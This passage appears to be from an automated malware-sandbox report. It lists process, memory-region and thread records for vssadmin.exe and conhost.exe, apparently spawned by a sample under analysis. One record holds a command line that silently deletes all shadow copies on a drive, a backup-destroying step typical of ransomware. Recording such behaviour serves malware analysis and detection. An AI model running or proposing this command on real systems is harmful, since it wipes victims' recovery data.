	id = "41"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x4469e000"
	os_pid = "0xc48"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "35"
	os_parent_pid = "0xab4"
	cmd_line = "vssadmin  Delete Shadows /For=Q: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3092
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3093
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3094
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3095
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3096
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 3097
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 3098
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 3099
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 3100
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 3101
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 3102
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 3103
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3104
	        start_va = 0x7edd0000
	          end_va = 0x7edf2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007edd0000"
	        filename = ""

Region:
	              id = 3105
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3106
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3107
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3108
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3109
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3112
	        start_va = 0x100000
	          end_va = 0x1effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 3113
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3121
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3122
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3123
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3126
	        start_va = 0x4890000
	          end_va = 0x4acffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 3127
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3131
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3132
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3133
	        start_va = 0x7ecd0000
	          end_va = 0x7edcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ecd0000"
	        filename = ""

Region:
	              id = 3167
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3168
	        start_va = 0x1e0000
	          end_va = 0x1effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001e0000"
	        filename = ""

Region:
	              id = 3169
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 3170
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 3171
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3172
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 3173
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 3174
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 3179
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 3180
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 3181
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 3182
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 3183
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 3184
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 3185
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 3186
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 3187
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 3188
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 3189
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 3190
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 3191
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 3192
	        start_va = 0x4890000
	          end_va = 0x489ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 3193
	        start_va = 0x49d0000
	          end_va = 0x4acffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049d0000"
	        filename = ""

Region:
	              id = 3202
	        start_va = 0x480000
	          end_va = 0x607fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 3203
	        start_va = 0x48a0000
	          end_va = 0x48c9fff
	       monitored = 0
	     entry_point = 0x48a5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3204
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3205
	        start_va = 0x610000
	          end_va = 0x790fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000610000"
	        filename = ""

Region:
	              id = 3206
	        start_va = 0x48a0000
	          end_va = 0x48acfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 3207
	        start_va = 0x4ad0000
	          end_va = 0x5ecffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ad0000"
	        filename = ""

Region:
	              id = 3211
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 3212
	        start_va = 0x1c0000
	          end_va = 0x1c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3213
	        start_va = 0x48b0000
	          end_va = 0x48b3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048b0000"
	        filename = ""

Region:
	              id = 3214
	        start_va = 0x48c0000
	          end_va = 0x49a9fff
	       monitored = 0
	     entry_point = 0x48fd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 3222
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 3515
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 3516
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3517
	        start_va = 0x48d0000
	          end_va = 0x48d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048d0000"
	        filename = ""

Region:
	              id = 3574
	        start_va = 0x7a0000
	          end_va = 0x7dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007a0000"
	        filename = ""

Region:
	              id = 3575
	        start_va = 0x7e0000
	          end_va = 0x81ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 3600
	        start_va = 0x820000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 3601
	        start_va = 0x48e0000
	          end_va = 0x491ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 3602
	        start_va = 0x4920000
	          end_va = 0x495ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004920000"
	        filename = ""

Region:
	              id = 3603
	        start_va = 0x4960000
	          end_va = 0x499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004960000"
	        filename = ""

Region:
	              id = 3669
	        start_va = 0x5ed0000
	          end_va = 0x5faffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3677
	        start_va = 0x5fb0000
	          end_va = 0x602ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005fb0000"
	        filename = ""

Region:
	              id = 3678
	        start_va = 0x49a0000
	          end_va = 0x49a8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 254
	os_tid = 0xc4c


Thread:
	id = 258
	os_tid = 0xc60


Thread:
	id = 278
	os_tid = 0x1148


Thread:
	id = 280
	os_tid = 0xb70


Thread:
	id = 282
	os_tid = 0x490


Process:
	id = "42"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x31084000"
	os_pid = "0xc54"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xc38"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3135
	        start_va = 0x18800000
	          end_va = 0x189fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000018800000"
	        filename = ""

Region:
	              id = 3136
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3137
	        start_va = 0x29d8800000
	          end_va = 0x29d89fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000029d8800000"
	        filename = ""

Region:
	              id = 3138
	        start_va = 0x29d8a00000
	          end_va = 0x29d8a3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000029d8a00000"
	        filename = ""

Region:
	              id = 3139
	        start_va = 0x203f2500000
	          end_va = 0x203f251ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2500000"
	        filename = ""

Region:
	              id = 3140
	        start_va = 0x203f2520000
	          end_va = 0x203f2534fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2520000"
	        filename = ""

Region:
	              id = 3141
	        start_va = 0x7df5ff960000
	          end_va = 0x7ff5ff95ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff960000"
	        filename = ""

Region:
	              id = 3142
	        start_va = 0x7ff7ff730000
	          end_va = 0x7ff7ff752fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff730000"
	        filename = ""

Region:
	              id = 3143
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 3144
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3145
	        start_va = 0x203f2540000
	          end_va = 0x203f277ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2540000"
	        filename = ""

Region:
	              id = 3146
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 3149
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3150
	        start_va = 0x203f2500000
	          end_va = 0x203f250ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2500000"
	        filename = ""

Region:
	              id = 3151
	        start_va = 0x7ff7ff630000
	          end_va = 0x7ff7ff72ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff630000"
	        filename = ""

Region:
	              id = 3152
	        start_va = 0x203f2540000
	          end_va = 0x203f25fdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3153
	        start_va = 0x203f2680000
	          end_va = 0x203f277ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2680000"
	        filename = ""

Region:
	              id = 3154
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 3155
	        start_va = 0x29d8a40000
	          end_va = 0x29d8a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000029d8a40000"
	        filename = ""

Region:
	              id = 3156
	        start_va = 0x203f2780000
	          end_va = 0x203f288ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2780000"
	        filename = ""

Region:
	              id = 3157
	        start_va = 0x203f2510000
	          end_va = 0x203f2516fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2510000"
	        filename = ""

Region:
	              id = 3158
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 3159
	        start_va = 0x203f2600000
	          end_va = 0x203f2600fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2600000"
	        filename = ""

Region:
	              id = 3160
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 3161
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 3162
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 3163
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 3164
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 3165
	        start_va = 0x203f2610000
	          end_va = 0x203f2616fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2610000"
	        filename = ""

Region:
	              id = 3166
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 3175
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 3176
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 3177
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 3178
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 3196
	        start_va = 0x203f2620000
	          end_va = 0x203f2620fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2620000"
	        filename = ""

Region:
	              id = 3197
	        start_va = 0x203f2630000
	          end_va = 0x203f2630fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000203f2630000"
	        filename = ""

Region:
	              id = 3198
	        start_va = 0x203f2890000
	          end_va = 0x203f2a17fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2890000"
	        filename = ""

Region:
	              id = 3199
	        start_va = 0x203f2a20000
	          end_va = 0x203f2ba0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000203f2a20000"
	        filename = ""

Region:
